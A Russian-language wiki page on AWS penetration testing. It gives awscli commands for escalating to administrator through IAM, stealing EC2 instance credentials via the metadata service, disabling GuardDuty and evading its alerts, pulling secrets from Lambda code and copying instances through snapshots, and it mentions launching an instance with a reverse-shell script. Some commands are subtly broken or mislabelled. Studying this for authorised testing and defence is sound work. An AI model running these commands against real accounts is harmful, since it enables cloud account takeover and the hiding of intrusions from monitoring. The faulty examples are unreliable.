== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-12T21:02:24Z

Drakylar: /* Роли - повышение до админа */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

Сбросить пароль у других пользователей:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam update-login-profile --user-name target_user --password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:PassRole + ec2:RunInstance ====

См. EC2

==== iam:PassRole + glue:CreateDevEndpoint ====

См. Glue

=== Роли - повышение до админа ===

==== iam:AddUserToGroup ====

Добавить юзера в административную группу:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam add-user-to-group --group-name <название_группы> --user-name <логин>
</syntaxhighlight>

==== iam:PutUserPolicy ====

Право добавить своб политику к ранее скомпрометированным обьектам.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam put-user-policy --user-name <логин> --policy-name my_inline_policy --policy-document file://path/to/administrator/policy.json
</syntaxhighlight>

==== iam:CreateLoginProfile ====

Привилегия для создания профиля(с паролем) для аккаунта, выставить новый пароль и перейти под этого пользователя.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam create-login-profile --user-name target_user –password '|[3rxYGGl3@`~68)O{,-$1B”zKejZZ.X1;6T}<XT5isoE=LB2L^G@{uK>f;/CQQeXSo>}th)KZ7v?\\hq.#@dh49″=fT;|,lyTKOLG7J[qH$LV5U<9`O~Z”,jJ[iT-D^(' --no-password-reset-required
</syntaxhighlight>

==== iam:UpdateLoginProfile ====

Добавить существующую политику к любому пользователю.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachGroupPolicy ====

Добавить существующую политику к любой группе.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-user-policy --user-name my_username --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:AttachRolePolicy ====

Добавить существующую политику к любой роли.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws iam attach-role-policy --role-name role_i_can_assume --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
</syntaxhighlight>

==== iam:CreatePolicy ====

Создать административную политику.

==== iam:CreatePolicyVersion + iam:SetDefaultPolicyVersion ====

Позволяет поменять политику, выставленную администраторами сети и применить ее, после чего повысить привилегии у обьекта.

Например, если у вас это право, то вы можете создать произвольную политику, дающую полный доступ и применить ее.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание политики
aws iam create-policy-version --policy-arn target_policy_arn --policy-document file://path/to/administrator/policy.json --set-as-default
# Установка политики по умолчанию.
aws iam set-default-policy-version –policy-arn target_policy_arn –version-id v2
</syntaxhighlight>

==== iam:PassRole + ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile ====

См. EC2

==== iam:AttachUserPolicy ====

Позволяет прикрепить политику к пользователю. Если существует политика, дающая админские права - повышение.

== AWS Shield ==

Сервис для защиты от DDoS.

== Cognito ==

Позволяет быстро и просто добавлять возможности регистрации, авторизации и контроля доступа пользователей в мобильные и интернет-приложения.

=== Основное ===

Cognito отвечает за следующие действия:

* Регистрация пользователя (email + пароль)

* Авторизация пользователя

* Работа с сохраненной пользовательской информацией (устанавливается приложением)

* Специальные действия (например, предоставление AWS-ключей)

Все общение идет по HTTP(s). Особенность системы в том, что Cognito общается как напрямую с чужим веб-сайтом, так и напрямую с клиентским браузером. То есть веб-сервер не знает, какой был передан пароль (в нормальной реализации).

Пример URL: cognito-identity.us-east-1.amazonaws.com

За действие отвечает HTTP-заголовок "X-Amz-Target". В своем роде, это Endpoints API.

Какие параметры требуются для работы с ним:

1. Название Endpoint'а - "X-Amz-Target" заголовок

2. Регион - "aws_project_region" параметр

3. Session token - позже требуется для запросов.

4. Identity Pool ID - нужен для запросов типа Identity Pools.

Также пишут, что Cognito разделяется на две основные части:

* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
